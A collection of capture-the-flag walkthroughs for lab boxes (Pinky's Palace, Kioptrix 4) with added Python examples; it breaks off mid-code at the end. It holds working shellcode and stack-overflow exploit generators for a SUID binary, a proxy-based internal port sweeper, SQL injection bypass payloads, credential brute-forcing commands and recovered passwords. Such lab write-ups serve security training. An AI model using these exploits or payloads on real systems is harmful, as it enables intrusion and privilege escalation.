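Levels 2, 3 and 4 above are the same recipe: the offset, a return address equal to the frame address gdb reports, a 1000-byte NOP sled and the write-up's shellcode (which reopens /dev/tty on stdin and then execs /bin//sh), all delivered through argv. As an added example that is not the write-up's test.py, the Python 3 block below turns that into one reusable generator with the two checks that matter for argv delivery: the buffer must contain no NUL byte (argv strings are C strings, so a NUL would cut the payload short without any error), and the return address is aimed at the middle of the sled rather than its first byte, so that the small stack shifts between gdb and a normal run (different environment, different argv[0]) are absorbed in both directions. The gdb values are the level 2 ones; aiming at the middle is my choice, the write-up returns to the sled's first byte and that worked too.

```python
import struct
import sys

# Added example, not the write-up's test.py.  Python 3.

# The write-up's shellcode: close(0), open("/dev/tty") as the new fd 0, execve("/bin//sh").
SHELLCODE = (b"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9"
             b"\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3"
             b"\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80")


def pick_return_address(saved_eip_slot, nop_len):
    """Aim into the middle of the NOP sled that starts right after the saved EIP slot.

    gdb's "eip at 0xffffdd30" is the slot we overwrite; "frame at 0xffffdd34"
    is the first byte after it, where our NOPs begin.  Returning to the middle
    of the sled tolerates a stack shift of up to nop_len/2 bytes either way.
    """
    sled_start = saved_eip_slot + 4
    return sled_start + nop_len // 2


def nul_positions(data):
    """Offsets of every 0x00 byte; argv cannot carry any of them."""
    return [i for i, b in enumerate(data) if b == 0]


def build_argv_payload(offset, ret_addr, shellcode=SHELLCODE, nop_len=1000):
    """padding | return address (little-endian) | NOP sled | shellcode, verified NUL-free."""
    payload = (b"A" * offset + struct.pack("<I", ret_addr)
               + b"\x90" * nop_len + shellcode)
    nuls = nul_positions(payload)
    if nuls:
        raise ValueError("NUL byte(s) at %r would truncate argv" % nuls[:5])
    return payload


if __name__ == "__main__":
    # level 2 values from gdb above: offset 36, saved EIP slot at 0xffffdd30.
    # usage: ./levelTwo "$(python3 exploit.py)"   (quoted, so no word splitting)
    sys.stdout.buffer.write(build_argv_payload(36, pick_return_address(0xffffdd30, 1000)))
```

sys.stdout.buffer.write is the Python 3 equivalent of the Python 2 print used above: it emits raw bytes and no trailing newline. For level 3 and 4 the call becomes build_argv_payload(268, pick_return_address(0xffffd9b0, 1000)) and build_argv_payload(28, ...) with the same slot, straight from their info frame output.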

Still having issues with the last level... update to follow!

Pinky v1.225

This one was a fun box, my second with a buffer overflow. I cheated a bit to take some shortcuts, trying to find a more efficient way than using gdb. I will publish the method I built using examples I found elsewhere, such as https://blaksec.com

First, searching for the target:
nmap -Pn -T4 192.168.56.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-15 12:59 UTC
Nmap scan report for 192.168.56.100
Host is up (0.000096s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:58:FD:DE (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.101
Host is up (0.00032s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
8080/tcp open http-proxy
31337/tcp open Elite
MAC Address: 08:00:27:A3:C5:2A (Oracle VirtualBox virtual NIC)

Running Interlace for the first time (I wanted to try it: it runs a list of commands against a list of targets in parallel, here three nmap scans) while investigating ports 8080 and 31337:
Command:
interlace -tL /root/boxes/pinky/targets.txt -o /root/boxes/pinky/output -cL /root/boxes/pinky/commands.txt -threads 20
commands.txt:
nmap -Pn -sC -sV -oN _output_/_target_-initial.txt _target_
nmap -Pn -p- -oN _output_/_target_-tcp-allports.txt _target_
nmap -Pn -sU --top-ports 50 -oN _output_/_target_-udp-top50.txt _target_
targets.txt:
192.168.56.101

A few more results:
cat 192.168.56.101-tcp-allports.txt
# Nmap 7.70 scan initiated Mon Jul 15 13:02:11 2019 as: nmap -Pn -p- -oN /root/boxes/pinky/output/192.168.56.101-tcpallports.txt 192.168.56.101
Nmap scan report for 192.168.56.101
Host is up (0.00032s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
8080/tcp open http-proxy
31337/tcp open Elite
64666/tcp open unknown

cat 192.168.56.101-udp-top50.txt
# Nmap 7.70 scan initiated Mon Jul 15 13:02:11 2019 as: nmap -Pn -sU –top-ports 50 -oN /root/boxes/pinky/output/
192.168.56.101-udp-top50.txt 192.168.56.101
Nmap scan report for 192.168.56.101
Host is up (0.00041s latency).
Not shown: 49 closed ports
PORT STATE SERVICE
68/udp open|filtered dhcpc

 

Trying to connect:

telnet 192.168.56.101 64666

Trying 192.168.56.101…
Connected to 192.168.56.101.
Escape character is ‘^]’.
SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u2
ls
Protocol mismatch.
Connection closed by foreign host.
Port 8080 returns a 403 error from nginx/1.10.3.
Port 31337 returns "ERROR: The requested URL could not be retrieved", served by squid/3.5.23.

Did a searchsploit on both versions but it returned nothing good.
Running dirbuster on 8080 and 31337:
Nothing on 8080
31337 returns I/O errors

Trying to connect to port 64666 using burp:
SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u2
Protocol mismatch.
Trying to connect:
ssh 192.168.56.101 -p 64666
The authenticity of host ‘[192.168.56.101]:64666 ([192.168.56.101]:64666)’ can’t be established.
ECDSA key fingerprint is SHA256:V5qJjz+sQ8RoowMS4sNiH5d8pNwt6ayyKI68H2twYEo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added ‘[192.168.56.101]:64666’ (ECDSA) to the list of known hosts.
root@192.168.56.101’s password:
Permission denied, please try again.

So back to Squid. An open forward proxy on the target lets us send requests that originate from the box itself, so let's use it to reach the web server on the target's own localhost:
curl http://127.0.0.1:8080 -x 192.168.56.101:31337
<html>
<head>
<title>Pinky’s HTTP File Server</title>
</head>
<body>
<center><h1>Pinky’s HTTP File Server</h1></center>
<center><h3>Under Development!</h3></center>
</body>
<style>
html{
background: #f74bff;
}

It works…

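What the curl -x trick does at the protocol level, as an added example that is not part of the original post: the Squid on 31337 is an open forward proxy, so a request for http://127.0.0.1:8080/ is opened by the box itself and satisfies nginx's localhost-only rule. The script sends the same absolute-URI GET that curl sends, then reads Squid's own X-Squid-Error header to tell "the internal port answered" apart from "Squid refused (ACL)" and "Squid could not connect (closed port)". The proxy address and port list are the ones from this box; the sample responses and the function names are my own, and it needs Python 3.8 or later.

```python
"""Reach loopback-only services through an open Squid proxy.

Added example, not code from the original post. It reproduces what
  curl http://127.0.0.1:8080 -x 192.168.56.101:31337
does at the protocol level: the proxy, not the attacker, opens the connection
to 127.0.0.1, so nginx's "localhost only" rule on 8080 is satisfied. The
proxy address and port list are from the box; everything else is assumed.
"""
import socket

PROXY = ("192.168.56.101", 31337)   # Squid 3.5.23 found by nmap


def build_proxy_request(host: str, port: int, path: str = "/") -> bytes:
    """GET with an absolute URI: that is how a client asks a forward proxy
    for a resource, and it is exactly what curl -x sends."""
    return (
        f"GET http://{host}:{port}{path} HTTP/1.1\r\n"
        f"Host: {host}:{port}\r\n"
        "User-Agent: curl/7.64.0\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode()


def classify(raw: bytes) -> str:
    """Decide what a raw proxied response says about the internal target.

    Squid stamps its own error pages with an X-Squid-Error header, which is
    the reliable way to tell "Squid refused" (ERR_ACCESS_DENIED) and "Squid
    could not connect" (ERR_CONNECT_FAIL, a closed port) from a real answer
    that happens to be a 403 or 503 from the internal service.
    """
    if not raw:
        return "no-response"
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    parts = lines[0].split()
    if len(parts) < 2 or not parts[0].startswith(b"HTTP/") or not parts[1].isdigit():
        return "not-http"
    status = int(parts[1])
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"x-squid-error":
            value = value.strip()
            code = value.split()[0].decode(errors="replace") if value else "?"
            return "proxy-acl-denied" if code == "ERR_ACCESS_DENIED" else f"unreachable:{code}"
    return f"reachable:{status}"


def probe(host: str, port: int, proxy=PROXY, timeout: float = 5.0) -> str:
    """Send one request through the proxy and classify the reply
    (needs network access to the proxy)."""
    try:
        with socket.create_connection(proxy, timeout=timeout) as s:
            s.sendall(build_proxy_request(host, port))
            raw = b""
            while chunk := s.recv(4096):
                raw += chunk
    except OSError:
        return "no-response"
    return classify(raw)


if __name__ == "__main__":
    # Sweep a few loopback ports behind the proxy; 8080 should come back reachable.
    for p in (22, 80, 3306, 8080, 64666):
        print(f"127.0.0.1:{p} -> {probe('127.0.0.1', p)}")
```

Run it from the attacking machine to sweep loopback ports behind the proxy; changing the host part of the URL reaches other hosts on the target's internal network in the same way, which is the real-world reason an open Squid is a finding and not just a curiosity.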
So now we know we can run dirb through the proxy (-p):
dirb http://127.0.0.1:8080 /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -p 192.168.56.101:31337
—————–
DIRB v2.22
By The Dark Raver
—————–
START_TIME: Tue Jul 16 15:40:03 2019
URL_BASE: http://127.0.0.1:8080/
WORDLIST_FILES: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
PROXY: 192.168.56.101:31337
—————–
GENERATED WORDS: 87568
—- Scanning URL: http://127.0.0.1:8080/ —-
==> DIRECTORY: http://127.0.0.1:8080/littlesecrets-main/
—- Entering directory: http://127.0.0.1:8080/littlesecrets-main/ —-
—————–
END_TIME: Tue Jul 16 15:43:45 2019
DOWNLOADED: 175136 – FOUND: 0
So let's curl it:
curl http://127.0.0.1:8080/littlesecrets-main/ -x 192.168.56.101:31337
<html>
<head>
<title>Login</title>
</head>
<body>
<center>
<div class=”titlelog”>
<h1>Pinky’s Admin Files Login</h1>
</div>
</center>
<center>
<div class=”log”>
<form action=”login.php” method=”post”>
<h3>User:</h3>
<input type=”text” name=”user”/>
<h3>Password:</h3>
<input type=”password” name=”pass”/>
<input type=”submit” value=”Login”/>
</form>
</div>
</center>
</body>
<style>
html{
background: #f74bff;
}
</style>
<!– Luckily I only allow localhost access to my webserver! Now I won’t get hacked. –>
</html>
Funny!!!!!!

 

There is also a logs.php that records every login attempt in a database, so the login form talks to a database backend. Running sqlmap through the proxy:
sqlmap --proxy=http://192.168.56.101:31337 --dbms=mysql --data="user=admin&pass=password&submit=Login" --url http://127.0.0.1:8080/littlesecrets-main/login.php --level=5 --risk=3 -T users --dump

Password found for user pinkymanage: 3pinkysaf33pinkysaf3

So login:

ssh -l pinkymanage -p 64666 192.168.56.101
pinkymanage@192.168.56.101’s password:
Linux pinkys-palace 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Feb 2 04:00:51 2018 from 127.0.0.1

pinkymanage@pinkys-palace:~$
Nothing in the user home, and pinky's home is not accessible.

So moving to /tmp. Trying to copy linenum.sh over didn't work, maybe my network config, so good old cut and paste! Then:
./enum.sh -t > enum.txt

Also checking var directory:
pinkymanage@pinkys-palace:/var/www/html/littlesecrets-main/ultrasecretadminf1l35$ ll
total 16
drwxr-xr-x 2 root root 4096 Feb 2 2018 .
drwxr-xr-x 3 root root 4096 Feb 2 2018 ..
-rw-r–r– 1 root root 99 Feb 2 2018 note.txt
-rw-r–r– 1 root root 2270 Feb 2 2018 .ultrasecret
pinkymanage@pinkys-palace:/var/www/html/littlesecrets-main/ultrasecretadminf1l35

$ cat note.txt
Hmm just in case I get locked out of my server I put this rsa key here.. Nobody will find it heh..
pinkymanage@pinkys-palace:/var/www/html/littlesecrets-main/ultrasecretadminf1l35

$ cat .ultrasecret
…
The = at the end makes me think it's Base64 encoded.

Decoded: base64 -d .ultrasecret > /tmp/ssh.key
-----BEGIN RSA PRIVATE KEY-----
…
-----END RSA PRIVATE KEY-----

Now I can login as pinky:
pinkymanage@pinkys-palace:/tmp$ ssh -l pinky -i /tmp/ssh.key -p 64666 192.168.56.101
Linux pinkys-palace 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
Last login: Fri Feb 2 05:54:01 2018 from 172.19.19.2

Interesting binary in pinky's home, SUID root:
ll
total 44
drwx—— 3 pinky pinky 4096 Jul 22 16:03 .
drwxr-xr-x 4 root root 4096 Feb 2 2018 ..
-rwsr-xr-x 1 root root 8880 Feb 2 2018 adminhelper
lrwxrwxrwx 1 root root 9 Feb 1 2018 .bash_history -> /dev/null
-rw-r–r– 1 pinky pinky 220 Jan 28 2018 .bash_logout
-rw-r–r– 1 pinky pinky 3526 Jul 22 16:03 .bashrc
lrwxrwxrwx 1 pinky pinky 9 Feb 1 2018 .mysql_history -> /dev/null
-rw-r–r– 1 root root 280 Feb 2 2018 note.txt
-rw-r–r– 1 pinky pinky 675 Jan 28 2018 .profile
drwx—— 2 pinky pinky 4096 Feb 2 2018 .ssh
-rw——- 1 pinky pinky 2879 Jul 22 16:03 .viminfo

pinky@pinkys-palace:~$ cat note.txt
Been working on this program to help me when I need to do administrator tasks sudo is just too hard to configure and I can
never remember my root password! Sadly I’m fairly new to C so I was working on my printing skills because Im not sure how
to implement shell spawning yet 🙁

pinky@pinkys-palace:~$ ./adminhelper
pinky@pinkys-palace:~$ ./adminhelper sss
sss

It is SUID root and echoes its first argument… Let's try to overflow it:
pinky@pinkys-palace:~$ ./adminhelper $(python -c 'print "A" * 300')
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault

Bingo!

Now let's exploit it:

Crash it to verify the buffer overflow (done above).

Find the offset at which the saved return address gets overwritten. This is what I will explain later… I need to make progress on this part; I could do it but not explain it properly.

Then put the payload in an environment variable (the "egg"): a 100-byte NOP sled followed by a 27-byte x86-64 execve("/bin/sh") shellcode, which contains no NUL bytes so it survives getenv():
export MYEGG=$(python -c 'print("\x90" * 100 + "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05")')
pinky@pinkys-palace:~$ echo $MYEGG

Let's find the egg's address on the stack:

vi getMYEGGAddr.c

#include <stdio.h>
#include <stdlib.h>
int main()
{
char *addr;
/* address of the MYEGG string in this process's environment */
addr = getenv("MYEGG");
printf("MYEGG is at %p\n", addr);
exit(0);
}

gcc getMYEGGAddr.c -o getMYEGGAddr
(Without the <stdio.h> include, gcc warns about an implicit declaration of printf but still builds the binary.)

pinky@pinkys-palace:/tmp$ ./getMYEGGAddr
MYEGG is at 0x7fffffffef58
72 bytes of padding reach the saved return address; the six address bytes are reversed ([::-1]) because x86-64 stores them little-endian:
./adminhelper $(python -c 'print("A" * 72 + "\x7f\xff\xff\xff\xef\x58"[::-1])')
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX
# id
uid=1000(pinky) gid=1000(pinky) euid=0(root) groups=1000(pinky),24(cdrom),25(floppy),29(audio),30(dip),44(video),
46(plugdev),108(netdev)
# whoami
root
# alias ll="ls -al"
# cd /root
# ll
total 40
drwx—— 3 root root 4096 Mar 5 2018 .
drwxr-xr-x 22 root root 4096 Jan 28 2018 ..
lrwxrwxrwx 1 root root 9 Feb 1 2018 .bash_history -> /dev/null
-rw-r–r– 1 root root 570 Jan 31 2010 .bashrc
lrwxrwxrwx 1 root root 9 Feb 2 2018 .mysql_history -> /dev/null
-rw-r–r– 1 root root 148 Aug 17 2015 .profile
drwx—— 2 root root 4096 Feb 2 2018 .ssh
-rw——- 1 root root 14803 Mar 5 2018 .viminfo
-rw-r–r– 1 root root 207 Mar 5 2018 root.txt
# cat root.txt
===========[!!!CONGRATS!!!]===========
[+] You r00ted Pinky’s Palace Intermediate!
[+] I hope you enjoyed this box!
[+] Cheers to VulnHub!
[+] Twitter: @Pink_P4nther
Flag: 99975cfc5e2eb4c199d38d4a2b2c03ce

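The offset-finding step the walkthrough skips, as an added example that is not from the original post. It replaces the "A" * 300 with a cyclic pattern, turns the pattern bytes seen in a register or at $rsp after the crash into an offset, and assembles the final argument as raw bytes. The 72-byte padding and the egg address 0x7fffffffef58 are the values used above; the shellcode is the 27-byte x86-64 execve("/bin/sh") stub exported as MYEGG; the function names, the 1000-byte pattern length and the 100-byte sled are this example's own assumptions. Two practitioner notes: getMYEGGAddr and adminhelper do not see MYEGG at exactly the same address (the exec'd filename and the environment differ slightly between the two processes), which is what the NOP sled absorbs; and under Python 3, print() would re-encode bytes like \xff as UTF-8, so the script writes raw bytes to stdout instead.

```python
"""Offset finding and payload assembly for the adminhelper overflow.

Added example, not code from the original post. It automates the step the
walkthrough leaves out: a cyclic pattern replaces "A" * 300, the pattern
bytes left in a register (or at $rsp) after the crash map back to an offset,
and the final argument is assembled as raw bytes. The 72-byte offset and the
egg address 0x7fffffffef58 are the values used above; the shellcode is the
27-byte x86-64 execve("/bin/sh") stub exported as MYEGG. Names, the 1000-byte
pattern length and the 100-byte sled are this example's own choices.
"""
import string
import struct
import sys

# Same bytes as the MYEGG export above; no NUL bytes, so it survives getenv().
SHELLCODE = (
    b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb"
    b"\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
)


def cyclic(length: int) -> bytes:
    """Metasploit-style pattern Aa0Aa1Aa2...: every 4-byte window is unique
    in the first 20280 bytes, so any fragment read from a crash is an offset."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += f"{upper}{lower}{digit}".encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("a pattern longer than 20280 bytes is not unique")


def offset_from_register(value: int, width: int = 8, length: int = 1000) -> int:
    """value is what gdb shows (e.g. x/gx $rsp at the faulting ret, or $rbp).
    The CPU loaded those bytes little-endian, so re-pack them the same way
    before searching the pattern."""
    needle = struct.pack("<Q", value)[:width]
    idx = cyclic(length).find(needle)
    if idx < 0:
        raise ValueError("register contents not found in the pattern")
    return idx


def build_payload(offset: int, ret_addr: int) -> bytes:
    """Padding up to the saved return address, then the egg address as six
    little-endian bytes. A user-space x86-64 address has its top two bytes
    zero; argv cannot carry NULs, but strcpy's terminator writes the 7th byte
    and the 8th byte of the saved address is already zero on the stack."""
    if ret_addr >> 48:
        raise ValueError("not a canonical user-space address")
    return b"A" * offset + struct.pack("<Q", ret_addr)[:6]


def build_egg(nop_sled: int = 100) -> bytes:
    """NOP sled + shellcode for the MYEGG variable. The sled absorbs the shift
    between where getMYEGGAddr and adminhelper see MYEGG."""
    return b"\x90" * nop_sled + SHELLCODE


def main(argv):
    """CLI: pattern <len> | offset <hexvalue> | payload <offset> <hexaddr> | egg.
    Raw bytes go to stdout; print() under Python 3 would UTF-8-encode 0x80+."""
    out = sys.stdout.buffer
    if argv[1:2] == ["pattern"]:
        out.write(cyclic(int(argv[2])))
    elif argv[1:2] == ["offset"]:
        print(offset_from_register(int(argv[2], 16)))
    elif argv[1:2] == ["payload"]:
        out.write(build_payload(int(argv[2]), int(argv[3], 16)))
    elif argv[1:2] == ["egg"]:
        out.write(build_egg())
    else:
        sys.exit("usage: pattern <len> | offset <hex> | payload <offset> <hexaddr> | egg")


if __name__ == "__main__":
    main(sys.argv)
```

Usage on the box, with this script saved as overflow.py: ./adminhelper "$(python3 overflow.py pattern 300)" crashes it under gdb; x/gx $rsp at the faulting ret gives the 8 pattern bytes that landed on the return address, and python3 overflow.py offset 0x<those bytes> prints 72; then export MYEGG="$(python3 overflow.py egg)", run getMYEGGAddr, and ./adminhelper "$(python3 overflow.py payload 72 0x7fffffffef58)". The 72 = 64 + 8 layout (a 64-byte buffer followed by the saved RBP) is an inference from the working offset, not something the binary was disassembled to confirm here.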
 

Thanks @Pink_P4nther for the box… Lot of fun…

And thanks @vulnhub!!!!!!! A big part of my training!

 

See you for the next box and the buffer overflow walkthrough… Almost done writing it for 32 and 64 bits, my most challenging exercise so far!

Kioptrix Level 4

Starting with a quick scan:

nmap -Pn -T4 192.168.79.0/24
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-06-06 08:48 ADT
Nmap scan report for 192.168.79.217
Host is up (0.00032s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:CF:86:2E (VMware)

My goal today is to do this box as fast as possible.

The webpage is a login form.

Running Nikto:

nikto -host http://192.168.79.217 -output nikto.txt
– Nikto v2.1.6
—————————————————————————
+ Target IP: 192.168.79.217
+ Target Hostname: 192.168.79.217
+ Target Port: 80
+ Start Time: 2019-06-06 08:52:20 (GMT-3)
—————————————————————————
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 98933, size: 5108, mtime: Tue Aug 28 07:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie PHPSESSID created without the httponly flag
+ 8724 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time: 2019-06-06 08:52:34 (GMT-3) (14 seconds)
—————————————————————————

Then gobuster:

gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.79.217 -o gobuster.txt

/index (Status: 200)
/images (Status: 301)
/member (Status: 302)
/logout (Status: 302)
/john (Status: 301)
/robert (Status: 301)
/server-status (Status: 403)

While it’s running, I send the page to Burp:

POST /checklogin.php HTTP/1.1
Host: 192.168.79.217
User-Agent: Mozilla/4.0 (compatible; Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060414; Windows NT 5.1)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.79.217/
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Cookie: PHPSESSID=cca8c9b6b000df9f7870bbf98bdba878
Connection: close
Upgrade-Insecure-Requests: 1

myusername=erik&mypassword=erik&Submit=Login

Response:

HTTP/1.1 200 OK
Date: Thu, 06 Jun 2019 08:59:31 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.6
Content-Length: 109
Connection: close
Content-Type: text/html

Wrong Username or Password<form method=”link” action=”index.php”><input type=submit value=”Try Again”></form>

Not much there

Scanning for SMB vuln:

nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 192.168.79.217

PORT STATE SERVICE REASON
445/tcp open microsoft-ds syn-ack ttl 64
MAC Address: 00:0C:29:CF:86:2E (VMware)

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false

Nothing

running dotdotpwn (Directory traversal) in the meantime and intruder on Burp for SQL injection.

Scanning SMB shares:

nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse 192.168.79.217

PORT STATE SERVICE REASON
445/tcp open microsoft-ds syn-ack ttl 64
MAC Address: 00:0C:29:CF:86:2E (VMware)

Host script results:
| smb-enum-shares:
| account_used: guest
| \\192.168.79.217\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (Kioptrix4 server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\192.168.79.217\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)

Maybe something.

smbclient //192.168.79.217/IPC$
Enter WORKGROUP\root’s password:
Anonymous login successful
Try “help” to get a list of possible commands.
smb: \> dir
NT_STATUS_NETWORK_ACCESS_DENIED listing \*

Nothing there

Trying a null session:
rpcclient -U "" 192.168.79.217

Seems to be working.
rpcclient $> enumdomusers
user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]

We now have a list of users!

We can start trying to crack the passwords:

wfuzz -w /usr/share/seclists/Passwords/darkc0de.txt -d "myusername=john&mypassword=FUZZ&Submit=Login" --hc 200 -u http://192.168.79.217

Also trying hydra on ssh:
hydra -l john -P darkc0de.txt 192.168.79.217 ssh

Both returned nothing

Trying sqlmap:

sqlmap --level 3 --risk 3 -u http://192.168.79.217/checklogin.php --data "myusername=erik&mypassword=password&Submit=Login" --method POST --dbms MYSQL

[11:45:49] [INFO] checking if the injection point on POST parameter ‘mypassword’ is a false positive
POST parameter ‘mypassword’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 2297 HTTP(s) requests:

Parameter: mypassword (POST)
Type: boolean-based blind
Title: OR boolean-based blind – WHERE or HAVING clause
Payload: myusername=erik&mypassword=-4226′ OR 5600=5600– bMfZ&Submit=Login

Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: myusername=erik&mypassword=password’ OR SLEEP(5)– WzXE&Submit=Login

[11:46:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[11:46:01] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/192.168.79.217’

[*] ending @ 11:46:01 /2019-06-06/

sqlmap got a 302 redirect to 'http://192.168.79.217:80/login_success.php?username=erik'. Do you want to follow? [Y/n] n
[11:51:00] [INFO] retrieved: members
[11:51:00] [INFO] fetching columns for table ‘members’ in database ‘members’
[11:51:00] [INFO] retrieved: 3
[11:51:00] [INFO] retrieved: id
[11:51:01] [INFO] retrieved: username
[11:51:01] [INFO] retrieved: password
[11:51:01] [INFO] fetching entries for table ‘members’ in database ‘members’
[11:51:01] [INFO] fetching number of entries for table ‘members’ in database ‘members’
[11:51:01] [INFO] retrieved: 2
[11:51:02] [INFO] retrieved: 1
[11:51:02] [INFO] retrieved: MyNameIsJohn
[11:51:02] [INFO] retrieved: john
[11:51:03] [INFO] retrieved: 2
[11:51:03] [INFO] retrieved: ADGAdsafdfwt4gadfga==
[11:51:04] [INFO] retrieved: robert
Database: members
Table: members
[2 entries]
+—-+———-+———————–+
| id | username | password |
+—-+———-+———————–+
| 1 | john | MyNameIsJohn |
| 2 | robert | ADGAdsafdfwt4gadfga== |
+—-+———-+———————–+

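Why the payload sqlmap found (mypassword=-4226' OR 5600=5600-- bMfZ) logs in as any user, and how boolean-based blind extraction recovers a table letter by letter, as an added example that is not part of the original post. It rebuilds a checklogin.php-style query over an in-memory SQLite table (constructed rows copied from the dump above; the real box runs MySQL, and SQLite accepts the same -- comment) and puts the string-built query beside the parameterized one. It then recovers john's password through the true/false oracle the way sqlmap's boolean-based blind mode did, using SQLite's UNICODE() where MySQL would use ASCII() or ORD(). The table, row data and function names are assumptions.

```python
"""Why `mypassword=-4226' OR 5600=5600-- bMfZ` logs in as any user.

Added example, not code from the original post. It rebuilds a
checklogin.php-style query over an in-memory SQLite table (constructed rows
copied from the dump above; the real box runs MySQL, and SQLite accepts the
same `--` comment) and puts the string-built query beside the parameterized
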